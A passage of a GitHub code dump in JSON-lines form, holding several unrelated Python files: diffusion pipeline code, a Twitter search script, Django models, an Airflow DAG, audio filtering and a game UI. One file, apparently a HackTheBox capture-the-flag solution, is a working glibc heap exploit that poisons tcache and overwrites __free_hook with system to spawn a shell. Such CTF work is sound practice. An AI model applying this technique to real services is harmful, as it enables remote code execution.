noise_pred.chunk(2)\n noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)\n\n # compute the previous noisy sample x_t -> x_t-1\n latents = self.scheduler.step(noise_pred, t, latents, **extra_step_kwargs).prev_sample\n\n # call the callback, if provided\n if i == len(timesteps) - 1 or ((i + 1) > num_warmup_steps and (i + 1) % self.scheduler.order == 0):\n progress_bar.update()\n if callback is not None and i % callback_steps == 0:\n callback(i, t, latents)\n\n if output_type == \"latent\":\n image = latents\n has_nsfw_concept = None\n elif output_type == \"pil\":\n # 8. Post-processing\n image = self.decode_latents(latents)\n\n # 9. Run safety checker\n image, has_nsfw_concept = self.run_safety_checker(image, device, encoder_hidden_states_list[0].dtype)\n\n # 10. Convert to PIL\n image = self.numpy_to_pil(image)\n else:\n # 8. Post-processing\n image = self.decode_latents(latents)\n\n # 9. Run safety checker\n image, has_nsfw_concept = self.run_safety_checker(image, device, encoder_hidden_states_list[0].dtype)\n\n # Offload last model to CPU\n if hasattr(self, \"final_offload_hook\") and self.final_offload_hook is not None:\n self.final_offload_hook.offload()\n\n if not return_dict:\n return (image, has_nsfw_concept)\n\n return StableDiffusionPipelineOutput(images=image, nsfw_content_detected=has_nsfw_concept)\n\n","repo_name":"mkshing/prompt-plus-pytorch","sub_path":"prompt_plus/prompt_plus_pipeline_stable_diffusion.py","file_name":"prompt_plus_pipeline_stable_diffusion.py","file_ext":"py","file_size_in_byte":19360,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"66"} +{"seq_id":"73643586130","text":"#!/usr/bin/python3\n\"\"\"\nA Python script that searches twitter\n\"\"\"\nimport requests\nimport sys\nimport base64\n\n\ndef getBearerToken():\n \"\"\"\n a function that returns the name of a star wars movie\n \"\"\"\n\n # url encode input arguments\n _key = requests.utils.quote(sys.argv[1])\n _secret = requests.utils.quote(sys.argv[2])\n\n # concat encoded _key and _secret\n concat = \":\".join([_key, _secret])\n # Base64 encode string\n encoded_token = base64.b64encode(concat.encode('utf-8'))\n encoded_string = str(encoded_token, 'utf-8')\n # encoded_string = str(encoded_token, 'utf-8')\n content_type = 'application/x-www-form-urlencoded;charset=UTF-8'\n _url = 'https://api.twitter.com/oauth2/token'\n _headers = {'Authorization': \"Basic {}\".format(encoded_string),\n 'Content-Type': content_type}\n _data = 'grant_type=client_credentials'\n res = requests.request('POST', _url, headers=_headers, data=_data)\n return(res.json().get('access_token'))\n\n\ndef searchAPI():\n \"\"\"\n A function that searches the twitter api\n \"\"\"\n\n _search = sys.argv[3]\n _token = getBearerToken()\n _url = 'https://api.twitter.com/1.1/search/tweets.json'\n _params = {'q': _search, 'count': '5'}\n _headers = {'Authorization': \"Bearer {}\".format(_token)}\n\n res = requests.request('GET', _url, headers=_headers, params=_params)\n parsed = res.json()\n statuses = parsed.get('statuses')\n for _dict in statuses:\n _id = _dict.get('id')\n _text = _dict.get('text')\n _name = _dict.get('user').get('name')\n print(\"[{}] {} by {}\".format(_id, _text, _name))\n\nif __name__ == '__main__':\n searchAPI()\n","repo_name":"dmaring/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/103-search_twitter.py","file_name":"103-search_twitter.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3035836154","text":"import math\nimport re\nfrom datetime import datetime, timedelta\n\nimport lightbulb\n\n\nclass TimeError(lightbulb.LightbulbError):\n pass\n\n\ntime_regex = re.compile(\"(?:(\\d{1,5})(h|s|m|d))+?\")\ntime_dict = {\"h\": 3600, \"s\": 1, \"m\": 60, \"d\": 86400}\n\nordinal = lambda n: \"%d%s\" % (\n n,\n \"tsnrhtdd\"[(math.floor(n / 10) % 10 != 1) * (n % 10 < 4) * n % 10 :: 4],\n)\n\n\nsteps = dict(\n year=timedelta(days=365),\n week=timedelta(days=7),\n day=timedelta(days=1),\n hour=timedelta(hours=1),\n minute=timedelta(minutes=1),\n second=timedelta(seconds=1),\n millisecond=timedelta(milliseconds=1),\n)\n\nsteps_shortened = dict(\n y=timedelta(days=365),\n w=timedelta(days=7),\n d=timedelta(days=1),\n h=timedelta(hours=1),\n m=timedelta(minutes=1),\n s=timedelta(seconds=1),\n ms=timedelta(milliseconds=1),\n)\n\n\ndef pretty_timedelta_shortened(td: timedelta) -> str:\n \"\"\"Returns a pretty shortened string of a timedelta\"\"\"\n\n if not isinstance(td, timedelta):\n raise ValueError(f\"timedelta expected, '{type(td)}' given.\")\n\n parts = []\n for name, span in steps_shortened.items():\n if td >= span:\n count = int(td / span)\n td -= count * span\n parts.append(\"{}{}\".format(count, name))\n if len(parts) >= 2 or name == \"s\":\n break\n elif len(parts):\n break\n\n return \" : \".join(parts)\n\n\ndef pretty_timedelta(td: timedelta) -> str:\n \"\"\"Returns a pretty string of a timedelta\"\"\"\n\n if not isinstance(td, timedelta):\n raise ValueError(\"timedelta expected, '{}' given\".format(type(td)))\n\n parts = []\n\n for name, span in steps.items():\n if td >= span:\n count = int(td / span)\n td -= count * span\n parts.append(\"{} {}{}\".format(count, name, \"s\" if count > 1 else \"\"))\n if len(parts) >= 2 or name == \"second\":\n break\n elif len(parts):\n break\n\n return \", \".join(parts)\n\n\ndef pretty_seconds_shortened(s) -> str:\n return pretty_timedelta_shortened(timedelta(seconds=s))\n\n\ndef pretty_seconds(s) -> str:\n return pretty_timedelta(timedelta(seconds=s))\n\n\ndef pretty_datetime(dt: datetime, ignore_time=False) -> str:\n if not isinstance(dt, datetime):\n raise ValueError(\"datetime expected, '{}' given\".format(type(dt)))\n\n return \"{0} {1}\".format(\n ordinal(int(dt.strftime(\"%d\"))),\n dt.strftime(\"%b %Y\" + (\"\" if ignore_time else \" %H:%M\")),\n )\n\n\ndef time_converter(argument: str) -> float:\n \"\"\"Function that converts given time into seconds.\n Parameters\n ----------\n argument : str\n Time to be converted\n Returns\n -------\n float\n Time in seconds.\n Raises\n ------\n TimeError\n When the values are wrong and when the input doesn't match the input regex.\n \"\"\"\n args = argument.lower()\n matches = re.findall(time_regex, args)\n time = 0\n for v, k in matches:\n try:\n time += time_dict[k] * float(v)\n except KeyError:\n raise TimeError(\"{} is an invalid time-key! h/m/s/d are valid!\".format(k))\n except ValueError:\n raise TimeError(\"{} is not a number!\".format(v))\n return time\n","repo_name":"Mantra-Development/Mantra-Bot","sub_path":"mantra/core/utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"32836352792","text":"import yaml\nfrom utils.logger import logger\nfrom vars import config_file\n\n\nclass Config:\n __instance = None\n\n @staticmethod\n def get_instance():\n \"\"\"Static access method.\"\"\"\n if Config.__instance is None:\n Config()\n return Config.__instance\n\n def __init__(self):\n \"\"\"Virtually private constructor\"\"\"\n if Config.__instance is not None:\n raise Exception(\"Config class is a singleton!\")\n else:\n Config.__instance = self\n try:\n with open(config_file) as f:\n config = yaml.safe_load(f)\n except Exception:\n logger.critical(f\"Failed to read config file '{config_file}'\")\n raise\n settings = config['settings']\n self.date_format = settings['date_format']\n self.file_name_len_min = settings['file_name_len_min']\n self.file_name_len_max = settings['file_name_len_max']\n","repo_name":"alexturchin88/python-training-fileserver","sub_path":"configuration/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5627287927","text":"import wave\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.fftpack import fft, fftshift, ifft\nfrom scipy import signal\nfrom sys import stdout\n\n\n#read the audio file\nfile_name = input(\"Audio file name -> \").strip() + \".wav\"\nlow_cut_off = int(input( \"Enter lower cut off frequancy -> \"))\nhigh_cut_off = int(input(\"Enter higher cut off frequancy -> \"))\naudio = wave.open(file_name, 'rb')\n\n#extract data from the file\nframe_rate = audio.getframerate()\nnchannels = audio.getnchannels()\nsampwidth = audio.getsampwidth()\nnframes = audio.getnframes()\n\nlow = 2 * low_cut_off / frame_rate\nhigh = 2 * high_cut_off /frame_rate\n\ntypes = {\n 0 : ['Low pass filter', 'lowpass'],\n 1 : ['High pass filter', 'highpass'],\n 2 : ['Band pass filter', 'bandpass'],\n 3 : ['Band stop filter', 'bandstop']\n}\n\nfor i in range(4):\n print(f'{i} : {types[i][0]}')\n\ntype_ = int(input(\"Enter the type of the filrer -> \").strip())\n\nprint(types[type_][1])\n\nb, a = signal.butter(3, [low, high], types[type_][1], analog=False)\n\nprint(\"\\nAudio input data\\n-------------------\\n\")\nprint(f\"Frame rate -> {frame_rate} Hz\")\nprint(f\"nchannels -> {nchannels}\")\nprint(f\"sample width -> {sampwidth}\\n\")\n\n\ndef process_chunk(start_, duration_ = 10):\n\n data = np.array([], dtype=\"int16\")\n\n #set position of audio\n global audio\n audio.rewind()\n audio.setpos(start_ * frame_rate * duration_)\n \n percentage = audio.tell() / audio.getnframes() * 100\n percentage = \"Filtering percentage -> {:.2f} %\".format(percentage)\n stdout.write('\\r' + percentage)\n stdout.flush() # important\n\n for _ in range(duration_):\n tempFrame = np.asarray(np.frombuffer(audio.readframes(frame_rate), dtype='int16'))\n if tempFrame.shape[0] == 0:\n break\n data = np.concatenate((data, tempFrame))\n\n output = signal.lfilter(b, a, data)\n filtered_bytes = output.astype(\"int16\").tobytes()\n\n return filtered_bytes\n\n\n\ndef main():\n duration = nframes / frame_rate\n\n destin = wave.open(f\"{low_cut_off} Hz {high_cut_off} Hz filteredSound.wav\", 'wb')\n destin.setnchannels(nchannels)\n destin.setframerate(frame_rate)\n destin.setsampwidth(sampwidth)\n\n for i in range(int(duration / 10) + 1):\n result = process_chunk(i)\n destin.writeframes(result)\n\n percentage = \"Filtering percentage -> {:.2f} %\".format(100)\n stdout.write('\\r' + percentage)\n stdout.flush() # important\n\n destin.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"0301yasiru/EngineeringToolSet","sub_path":"sound_filter.py","file_name":"sound_filter.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38297859935","text":"#!/usr/bin/env python3\n\nfrom pwn import *\n\ncontext.binary = 'bon-nie-appetit'\nglibc = ELF('glibc/libc.so.6', checksec=False)\n\n\ndef get_process():\n if len(sys.argv) == 1:\n return context.binary.process()\n\n host, port = sys.argv[1].split(':')\n return remote(host, port)\n\n\ndef create(p, amount: int, order: bytes):\n p.sendlineafter(b'> ', b'1')\n p.sendlineafter(b'[*] For how many: ', str(amount).encode())\n p.sendafter(b'[*] What would you like to order: ', order)\n\n\ndef show(p, index: int) -> bytes:\n p.sendlineafter(b'> ', b'2')\n p.sendlineafter(b'[*] Number of order: ', str(index).encode())\n p.recvuntil(b' => ')\n return p.recvuntil(b'\\n+=-=-=-=-=-=-=-=-=-=-=-=-=-=+\\n', drop=True)\n\n\ndef edit(p, index: int, order: bytes):\n p.sendlineafter(b'> ', b'3')\n p.sendlineafter(b'[*] Number of order: ', str(index).encode())\n p.sendafter(b'[*] New order: ', order)\n\n\ndef delete(p, index: int):\n p.sendlineafter(b'> ', b'4')\n p.sendlineafter(b'[*] Number of order: ', str(index).encode())\n\n\ndef main():\n p = get_process()\n\n for _ in range(9):\n create(p, 0x88, b'asdf')\n\n for i in range(8, -1, -1):\n delete(p, i)\n\n for _ in range(8):\n create(p, 0x88, b'a')\n\n leak = u64(show(p, 7)[:6].ljust(8, b'\\0'))\n log.info(f'Leaked main_arena address: {hex(leak)}')\n glibc.address = leak - 0x3ebd61\n log.success(f'Glibc base address: {hex(glibc.address)}')\n\n create(p, 0x18, b'A' * 0x18) # 8\n create(p, 0x18, b'B' * 0x18) # 9\n create(p, 0x18, b'C' * 0x18) # 10\n delete(p, 10)\n edit(p, 8, b'A' * 0x18 + b'\\x41')\n\n delete(p, 9)\n create(p, 0x38, b'B' * 0x18 + p64(0x21) + p64(glibc.sym.__free_hook))\n\n create(p, 0x18, b'/bin/sh\\0')\n create(p, 0x18, p64(glibc.sym.system))\n delete(p, 10)\n\n p.interactive()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"7Rocky/HackTheBox-scripts","sub_path":"Challenges/Pwn/Bon-nie-appetit/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"66"} +{"seq_id":"12550239648","text":"#-*- coding:utf-8 -*-\n\nfrom django.db import models\nfrom django.db.models import permalink\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_extensions.db.fields import AutoSlugField\n\nfrom articles.models import Tags\nfrom transmeta import TransMeta\n\n\nclass Category(models.Model):\n __metaclass__ = TransMeta\n\n parent = models.ForeignKey('self', verbose_name=_(\"Parent directory\"),\n blank=True, null=True, related_name='children')\n title = models.CharField(_(\"Title\"), max_length=255,\n blank=True, null=True)\n slug = models.SlugField(_(\"Slug\"))\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n image = models.ImageField(upload_to='category/images', \n verbose_name=_(\"Category image\"), blank=True, null=True)\n image_name = models.CharField(editable=False, max_length=255, \n blank=True, null=True)\n objects = models.Manager()\n\n class Meta:\n verbose_name = _(\"Category\")\n verbose_name_plural = _(\"Categories\")\n translate = ('title',)\n\n def __unicode__(self):\n return self.title\n\n\nclass News(models.Model):\n __metaclass__ = TransMeta\n\n category = models.ForeignKey(Category, blank=True, null=True)\n title = models.CharField(_(\"Title\"),\n max_length=255, blank=True, null=True)\n slug = AutoSlugField(populate_from='title', unique=True)\n pub_date = models.DateField(auto_now_add=True, verbose_name=(\"Publication date\")) \n change_date = models.DateField(auto_now = True)\n content = models.TextField(verbose_name=_(\"Text\"))\n is_published = models.BooleanField(verbose_name=_(\"Published\"))\n source = models.CharField(_(\"Source\"), max_length=255,\n blank=True, null=True)\n \n \n class Meta:\n verbose_name = _(\"News\")\n verbose_name_plural = _(\"News\")\n ordering = ['-pub_date']\n translate = ('title', 'content')\n \n def __unicode__(self):\n return self.title\n \n","repo_name":"myvasyabigi/Polonne","sub_path":"src/polonne/apps/news/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"72521684369","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.providers.amazon.aws.operators.ecs import ECSOperator\n\n\ndefault_args = {\n 'owner': 'ubuntu',\n 'start_date': datetime(2019, 8, 14),\n 'retry_delay': timedelta(seconds=60*60)\n}\n\nwith DAG('airflow_dag_test_external', catchup=False, default_args=default_args, schedule_interval=None) as dag:\n test = ECSOperator(\n task_id=\"test\",\n dag=dag,\n cluster=\"test-hybrid\",\n task_definition=\"test-external\",\n launch_type=\"EXTERNAL\",\n overrides={\n \"containerOverrides\": [ ],\n },\n awslogs_group=\"/ecs/test-external\",\n awslogs_stream_prefix=\"ecs\",\n )\n\n test","repo_name":"094459/blogpost-airflow-hybrid","sub_path":"dag/ecs-external.py","file_name":"ecs-external.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"70770755092","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QDialog, QMessageBox\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom battle_config import Servant, Enemy, Master, BattleConfig\nimport ViewDetailsUi\nimport pandas as pd\n\n\nclass Ui_ViewDetails(QDialog, ViewDetailsUi.Ui_Dialog):\n\tdef __init__(self):\n\t\tsuper(Ui_ViewDetails, self).__init__()\n\t\tself.setupUi(self)\n\t\tself.label_attribute.setWordWrap(True)\n\t\tself.label_details.setWordWrap(True)\n\t\tself.label_pic.setScaledContents(True)\n\t\tself.view_role_empty()\n\n\tdef view_role_servant(self, battle_round, role):\n\t\tattribute = role.attribute\n\t\tstate = role.state\n\t\t# 设置头像\n\t\tself.label_pic.setPixmap(QPixmap(role.pic_path))\n\t\t# 宝具\n\t\ttext = '宝具类型: ' + role.np_type + ' | ' + role.np_color + '\\n\\n'\n\t\tnp = role.np\n\t\tif len(np) > 0:\n\t\t\ttext += '效果: ' + '\\n'\n\t\tfor name in np['宝具效果'].values:\n\t\t\ttext += str(name) + '\\n'\n\t\ttext += '\\n'\n\t\t# 输出 3 个技能\n\t\tfor i in range(1, 4):\n\t\t\tif i == 1:\n\t\t\t\tskill = role.skill_1\n\t\t\telif i == 2:\n\t\t\t\tskill = role.skill_2\n\t\t\telif i == 3:\n\t\t\t\tskill = role.skill_3\n\t\t\telse:\n\t\t\t\treturn\n\n\t\t\ttext += '技能' + str(i) + ': \\n'\n\t\t\tif len(skill) == 0:\n\t\t\t\ttext += '效果暂不支持或对速刷无帮助\\n'\n\n\t\t\tfor i in skill[['技能效果', '幅度']].values:\n\t\t\t\tname = i[0]\n\t\t\t\tnum = str(i[1])\n\t\t\t\tif '(' in name:\n\t\t\t\t\ta = name.rfind('(')\n\t\t\t\t\tname = name[0:a] + num + name[a:len(name)]\n\t\t\t\telse:\n\t\t\t\t\tname = name + num\n\t\t\t\ttext += name + '\\n'\n\t\t\ttext += '\\n'\n\t\ttext = text.strip('\\n')\n\t\ttext = text.replace('nan', '')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\tself.label_details.setText(text)\n\t\t# 输出从者特性\n\t\ttext = ''\n\t\tfor item in attribute:\n\t\t\ttext += item + ', '\n\t\ttext = text.strip(', ')\n\t\tself.label_attribute.setText(text)\n\t\t# 输出从者buff状态\n\t\ttext_name = ' 状态 \\n\\n'\n\t\ttext_num = ' 幅度 \\n\\n'\n\t\ttext_times = ' 剩余次数 \\n\\n'\n\t\ttext_round = ' 剩余回合 \\n\\n'\n\t\tprint(state)\n\t\tfor index, row in state.iterrows():\n\t\t\tif row['开始回合'] <= battle_round <= row['结束回合']:\n\t\t\t\ttext_name += row['效果'] + '\\n'\n\t\t\t\ttext_num += row['幅度'] + '\\n'\n\t\t\t\tif row['剩余次数'] > 10:\n\t\t\t\t\ttext_times += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_times += str(int(row['剩余次数'])) + '\\n'\n\t\t\t\tif row['结束回合'] > 10:\n\t\t\t\t\ttext_round += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_round += str(int(row['结束回合']) - battle_round + 1) + '\\n'\n\n\t\ttext_times = text_times.replace('-1', '')\n\t\ttext_round = text_round.replace('-1', '')\n\t\tself.label_state.setText(text_name.replace('nan', ''))\n\t\tself.label_state_num.setText(text_num.replace('nan', ''))\n\t\tself.label_state_times.setText(text_times.replace('nan', ''))\n\t\tself.label_state_round.setText(text_round.replace('nan', ''))\n\n\tdef view_role_enemy(self, battle_round, role):\n\t\tattribute = role.attribute\n\t\tstate = role.state\n\t\t# 设置头像\n\t\tself.label_pic.setPixmap(QPixmap(role.pic_path))\n\t\t# 设置敌人信息\n\t\ttext = '初始血量: '\n\t\ttext += str(role.health_start) + '\\n\\n'\n\t\ttext += '现有血量: '\n\t\ttext += str(int(round(role.health))) + '\\n\\n'\n\t\ttext += '当前宝具伤害: '\n\t\ttext += str(int(round(role.damage))) + '\\n\\n'\n\t\ttext += '总计受到伤害: '\n\t\ttext += str(int(round(role.damage_total))) + '\\n\\n'\n\t\ttext += '死灵补正: '\n\t\tif role.enemy_np_type == 1:\n\t\t\ttext += '否'\n\t\telse:\n\t\t\ttext += '是'\n\t\tself.label_details.setText(text.replace('nan', ''))\n\t\t# 输出敌人特性\n\t\ttext = ''\n\t\tfor item in attribute:\n\t\t\ttext += item + ', '\n\t\ttext = text.strip(', ')\n\t\tself.label_attribute.setText(text)\n\t\t# 输出敌人buff状态\n\t\ttext_name = ' 状态 \\n\\n'\n\t\ttext_num = ' 幅度 \\n\\n'\n\t\ttext_times = ' 剩余次数 \\n\\n'\n\t\ttext_round = ' 剩余回合 \\n\\n'\n\t\tprint(state)\n\t\tfor index, row in state.iterrows():\n\t\t\tif row['开始回合'] <= battle_round <= row['结束回合']:\n\t\t\t\ttext_name += row['效果'] + '\\n'\n\t\t\t\ttext_num += row['幅度'] + '\\n'\n\t\t\t\tif row['剩余次数'] > 10:\n\t\t\t\t\ttext_times += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_times += str(int(row['剩余次数'])) + '\\n'\n\t\t\t\tif row['结束回合'] > 10:\n\t\t\t\t\ttext_round += '\\n'\n\t\t\t\telse:\n\t\t\t\t\ttext_round += str(int(row['结束回合']) - battle_round + 1) + '\\n'\n\n\t\ttext_times = text_times.replace('-1', '')\n\t\ttext_round = text_round.replace('-1', '')\n\t\tself.label_state.setText(text_name.replace('nan', ''))\n\t\tself.label_state_num.setText(text_num.replace('nan', ''))\n\t\tself.label_state_times.setText(text_times.replace('nan', ''))\n\t\tself.label_state_round.setText(text_round.replace('nan', ''))\n\n\tdef view_role_master(self, battle_round, role):\n\t\t# 设置头像\n\t\tself.label_pic.setPixmap(QPixmap(role.pic_path))\n\t\ttext = ''\n\t\t# 输出 3 个技能\n\t\tfor i in range(1, 4):\n\t\t\tif i == 1:\n\t\t\t\tskill = role.skill_1\n\t\t\telif i == 2:\n\t\t\t\tskill = role.skill_2\n\t\t\telif i == 3:\n\t\t\t\tskill = role.skill_3\n\t\t\telse:\n\t\t\t\treturn\n\n\t\t\ttext += '技能' + str(i) + ': \\n'\n\t\t\tif len(skill) == 0:\n\t\t\t\ttext += '效果暂不支持或对速刷无帮助\\n'\n\n\t\t\tfor i in skill[['技能效果', '幅度']].values:\n\t\t\t\tname = i[0]\n\t\t\t\tnum = str(i[1])\n\t\t\t\tif '(' in name:\n\t\t\t\t\ta = name.rfind('(')\n\t\t\t\t\tname = name[0:a] + num + name[a:len(name)]\n\t\t\t\telse:\n\t\t\t\t\tname = name + num\n\t\t\t\ttext += name + '\\n'\n\t\t\ttext += '\\n'\n\t\ttext = text.strip('\\n')\n\t\ttext = text.replace('nan', '')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\ttext = text.replace('\\n\\n\\n', '\\n\\n')\n\t\tself.label_details.setText(text)\n\n\t\tself.label_attribute.setText('')\n\t\tself.label_state.setText('')\n\t\tself.label_state_num.setText('')\n\t\tself.label_state_times.setText('')\n\t\tself.label_state_round.setText('')\n\n\tdef view_role_empty(self):\n\t\tself.label_attribute.setText('')\n\t\tself.label_state.setText('')\n\t\tself.label_state_num.setText('')\n\t\tself.label_state_times.setText('')\n\t\tself.label_state_round.setText('')\n\t\tself.label_pic.setPixmap(QPixmap())\n\t\tself.label_details.setText('')\n\n\tdef view_role(self, battle_round, role_type, role):\n\t\tif role_type == 'servant':\n\t\t\tif role.health > 0:\n\t\t\t\tself.view_role_servant(battle_round, role)\n\t\t\telse:\n\t\t\t\tself.view_role_empty()\n\t\telif role_type == 'enemy':\n\t\t\tif role.health_start > 0:\n\t\t\t\tself.view_role_enemy(battle_round, role)\n\t\t\telse:\n\t\t\t\tself.view_role_empty()\n\t\telif role_type == 'master':\n\t\t\tif role.order > 0:\n\t\t\t\tself.view_role_master(battle_round, role)\n\t\t\telse:\n\t\t\t\tself.view_role_empty()\n\t\telse:\n\t\t\tself.view_role_empty()\n\n\nif __name__ == '__main__':\n\tapp = QApplication(sys.argv)\n\t# 实例化子窗口\n\tselectservant = Ui_ViewDetails()\n\tselectservant.show()\n\n\tbc = BattleConfig()\n\tbc.battle_ground = '燃烧'\n\tbc.servant_1 = Servant(order=1, servant_id=163, level=90, skill_level=(10, 10, 10), np_level=5)\n\tbc.servant_2 = Servant(order=2, servant_id=215, level=70, skill_level=(10, 10, 10), np_level=5)\n\tbc.servant_3 = Servant(order=3, servant_id=215, level=70, skill_level=(10, 10, 10), np_level=5)\n\tbc.enemy_11 = Enemy(enemy_class='Berserker', health=100)\n\t# bc.enemy_12 = enemy(enemy_class='Saber', health=1000000)\n\tbc.enemy_13 = Enemy(enemy_class='Assassin', health=100, enemy_attribute='龙')\n\n\tbc.use_inherent_skill()\n\tdict1 = {'atk': 1000,\n\t 'range': '己方全体',\n\t '状态[Quick指令卡提升(不可解除)]': ['30%', 1, 3],\n\t '初始NP': 50}\n\tbc.use_costume_skill(1, dict1)\n\tbc.round_start(1)\n\tbc.use_skill(order=2, skill=1, target=1)\n\tbc.use_skill(order=2, skill=1)\n\tbc.use_skill(order=2, skill=3, target=1)\n\tbc.use_skill(order=3, skill=1, target=1)\n\tbc.use_skill(order=3, skill=1)\n\tbc.use_skill(order=3, skill=3, target=1)\n\tbc.use_skill(order=1, skill=3)\n\tbc.use_np(order=1, target=1)\n\tbc.master = Master(1, 10)\n\tselectservant.view_role(1, 'master', bc.master)\n\t#selectservant.view_role(1, 'enemy', bc.enemy_11)\n\n\n\n\n\tsys.exit(app.exec_())\n\n\n\n","repo_name":"lsq5i5j/fgo_teamup_win","sub_path":"Code_ViewDetails.py","file_name":"Code_ViewDetails.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"66"} +{"seq_id":"3941290084","text":"from py4j.java_gateway import JavaGateway, java_import\nfrom json.decoder import JSONDecoder\n\n\nclass ResultRecord:\n \"\"\"\n This class embodies an enriched monitoring record, constructed from the json reply of the htm network.\n \"\"\"\n def __init__(self, json_record):\n decoder = JSONDecoder()\n values = decoder.decode(json_record)\n self.state_code = values['stateCode']\n self.country_code = values['countryCode']\n self.site_num = values['siteNum']\n self.parameter_code = values['parameterCode']\n self.poc = values['poc']\n self.lat = values['latitude']\n self.lon = values['longitude']\n self.datum = values['datum']\n self.parameter_name = values['parameterName']\n self.date_local = values['dateLocal']\n self.time_local = values['timeLocal']\n self.date_gmt = values['dateGMT']\n self.time_gmt = values['timeGMT']\n self.sample_measurement = values['sampleMeasurement']\n self.units_of_measure = values['unitsOfMeasure']\n self.mdl = values['mdl']\n self.uncertainty = values['uncertainty']\n self.qualifier = values['qualifier']\n self.method_type = values['methodType']\n self.method_code = values['methodCode']\n self.method_name = values['methodName']\n self.state_name = values['stateName']\n self.county_name = values['countyName']\n self.date_of_last_change = values['dateOfLastChange']\n self.prediction = float(values['prediction'])\n self.error = float(values['error'])\n self.anomaly = float(values['anomaly'])\n self.prediction_next = float(values['predictionNext'])\n\n def __repr__(self):\n return ','.join([self.state_code, self.country_code, self.site_num, self.parameter_code, self.poc, self.lat,\n self.lon, self.datum, self.parameter_name, self.date_local, self.time_local, self.date_gmt,\n self.time_gmt, self.sample_measurement, self.units_of_measure, self.mdl, self.uncertainty,\n self.qualifier, self.method_type, self.method_code, self.method_name, self.state_name,\n self.date_of_last_change, self.prediction, self.error, self.anomaly, self.prediction_next])\n\n\ndef send_to_network(gateway, line):\n \"\"\"This function sends a monitoring record to a Java Gateway and receives the reply as a json.\n\n :param gateway: JavaGateway to use.\n :type gateway: JavaGateway.\n :param line: Input records as a line of comma-separated values.\n :type line: str.\n :return: json.\n \"\"\"\n values = line.split(',') + [0.0, 0.0, 0.0, 0.0]\n raw_record = gateway.jvm.MonitoringRecord(*values)\n record = gateway.entry_point.mappingFunc('1', raw_record).toJson()\n return record\n\n\nif __name__ == '__main__':\n gateway = JavaGateway()\n while True:\n line = input()\n result = send_to_network(gateway, line)\n print(ResultRecord(result))\n","repo_name":"Goopard/SparkStreamingHW","sub_path":"src/test_gateway.py","file_name":"test_gateway.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11629998796","text":"from random import seed\nimport itertools\nimport copy\nimport sys\nfrom collections import defaultdict\n\n\ndef kmersFunction(sequence, k):\n \n kmerIndices = defaultdict(list)\n\n for i in range(len(sequence) - k + 1):\n kmerIndices[str(sequence[i:i+k])].append(i)\n return kmerIndices\n\ndef hammingDistance(s1, s2):\n how_many_differences = 0\n\n if len(s1) != len(s2):\n return -1\n else:\n for i in range(len(s1)):\n if s1[i] != s2[i]:\n how_many_differences += 1\n return how_many_differences\n\n'''\ncalculating absolute freq of kmers in all reads (1 dist)\niterate through every kmer with freq below t\n\niterate through kmers, find distance between each below t with every above t\nsort by distance, then by absolute freq of the matched kmer\n'''\ndef correctionFunc(reads_path, k, t, d, isFile, kmerFreqNew):\n\n try:\n #for kmers\n k = int(k)\n #frequency threshold\n t = int(t)\n #how many positions we can change\n d = int(d)\n except:\n print('error: bad values of k,t,d')\n return\n if k <= 0 or t < 0 or d < 0:\n print('bad input')\n return\n\n\n if isFile:\n try:\n with open(reads_path, 'r') as file:\n all_reads = file.read().split('\\n')\n except:\n print('error: bad reads path')\n return\n else:\n all_reads = copy.deepcopy(reads_path)\n\n try:\n if not kmerFreqNew:\n kmerIndices = kmersFunction(''.join(all_reads), k)\n kmerFreq = {k:len(v) for (k,v) in kmerIndices.items()}\n else:\n kmerFreq = copy.deepcopy(kmerFreqNew)\n\n corrected_set = set()\n\n for kmer in kmerFreq:\n\n '''\n (kmer, distance, absolute frequency)\n '''\n kmerReplacements = []\n\n\n if kmerFreq[kmer] < t:\n for kmer2 in kmerFreq:\n if kmer != kmer2 and kmerFreq[kmer2] >= t:\n distance = hammingDistance(kmer, kmer2) \n if distance <= d:\n kmerReplacements.append((kmer2, distance, kmerFreq[kmer2]))\n \n if kmerReplacements:\n '''\n sort by:\n ascending distance\n descending freq\n '''\n kmerReplacements.sort(key = lambda x: (x[1], -x[2]))\n # print('hi2')\n \n replacer = kmerReplacements[0][0]\n\n for 